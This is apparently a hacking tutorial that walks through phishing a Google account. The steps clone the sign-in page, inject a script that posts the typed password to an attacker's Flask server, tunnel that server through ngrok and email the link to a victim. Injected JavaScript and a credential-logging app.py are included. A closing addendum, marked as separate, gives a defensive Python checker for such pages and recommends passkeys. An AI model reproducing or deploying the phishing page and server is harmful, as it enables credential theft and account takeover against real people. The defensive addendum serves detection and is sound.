REQUIREMENTS
1)KALI LINUX
2)SUBLIME TEXT EDITOR
3)NGROK
STEP 1:
First, open your browser and search for Google sign in.
STEP 2:
Type the mail id you wanna hack; after entering the mail id, click Next.
STEP 3:
After entering the mail id, right-click with the mouse and click Inspect.
STEP 4:
After clicking Inspect Element, go to the Inspector tab or Elements tab, right-click, choose the option called EDIT AS HTML, and copy all the HTML code.
STEP 5:
Paste it into the Sublime Text editor and add some script at the end of the html tag.
I'll drop the code here:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function(e){
e.preventDefault()
auth=$('input[type=password]').val()
$.post(
"http://localhost:5000/auth",
{"password":auth},
function(data, status){
window.location="http://localhost:5000/login"
}
);
return false;
})
</script>
</html>
Save this file as login.html.
NOTE:
Do the same for the 2-factor authentication page.
STEP 6:
Next we need to write Python code that fetches the deets from the victim, and save it as app.py.
I'll give the code below:
app.py
#!/usr/bin/env python3
from flask import Flask, render_template, send_file, make_response, request
app = Flask(__name__)
@app.route(“/auth”, methods=[“POST”])
def auth():
print(request.form.to_dict())
return “ok”
@app.route(“/”)
def index():
response = make_response(send_file(“templates/login.html”))
response.headers.add(“Access-Control-Allow-Origin”, “*”)
return response
@app.route(“/login”)
def login():
return send_file(“templates/2fa.html”)
if __name__ == “__main__”:
app.run()
STEP 7:
Open a terminal in Linux, type as I did, and configure ngrok.
ngrok command
STEP 8:
Then send the link in a mail to the victim. BOOM…….!!!! You've got a password.
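A defender-side check for the page pattern STEP 5 produces, added here as an example and not part of the original post: it flags a page that has a password field and an inline script which reads that field and sends it to a host other than the expected sign-in host. `EXPECTED_HOSTS`, `audit_login_page` and the sample markup are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EXPECTED_HOSTS = {"accounts.google.com"}  # assumption: the brand's real sign-in host
READS_PASSWORD = re.compile(r"type\s*=\s*[\"']?password", re.I)
SEND_CALL = re.compile(r"(?:\$\.post|\$\.ajax|\bfetch|\.open)\s*\(")
URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)

class _Collector(HTMLParser):
    """Counts password inputs and gathers the bodies of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.password_inputs, self.scripts, self._in_script = 0, [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script" and "src" not in a:
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def audit_login_page(html):
    """Flag inline scripts that read a password field and send it to an unexpected host."""
    c = _Collector()
    c.feed(html)
    findings = []
    for js in c.scripts if c.password_inputs else []:
        if not (READS_PASSWORD.search(js) and SEND_CALL.search(js)):
            continue
        hosts = {urlparse(u).hostname or "" for u in URL.findall(js)}
        for host in sorted(hosts - EXPECTED_HOSTS):
            findings.append(f"password value sent or redirected to unexpected host: {host}")
        if "preventDefault" in js:
            findings.append("click handler suppresses the form's normal submission")
    return findings

# Constructed sample: a minimal page carrying the script shown in STEP 5.
CLONED = """<html><body><input type="password"><button>Next</button>
<script>$('button').click(function(e){e.preventDefault()
auth=$('input[type=password]').val()
$.post("http://localhost:5000/auth",{"password":auth},function(data,status){
window.location="http://localhost:5000/login"});return false;})</script></body></html>"""
```

Static checks like this only catch unobfuscated copies; origin-bound sign-in methods such as passkeys or FIDO2 security keys remain the control that makes a cloned page useless.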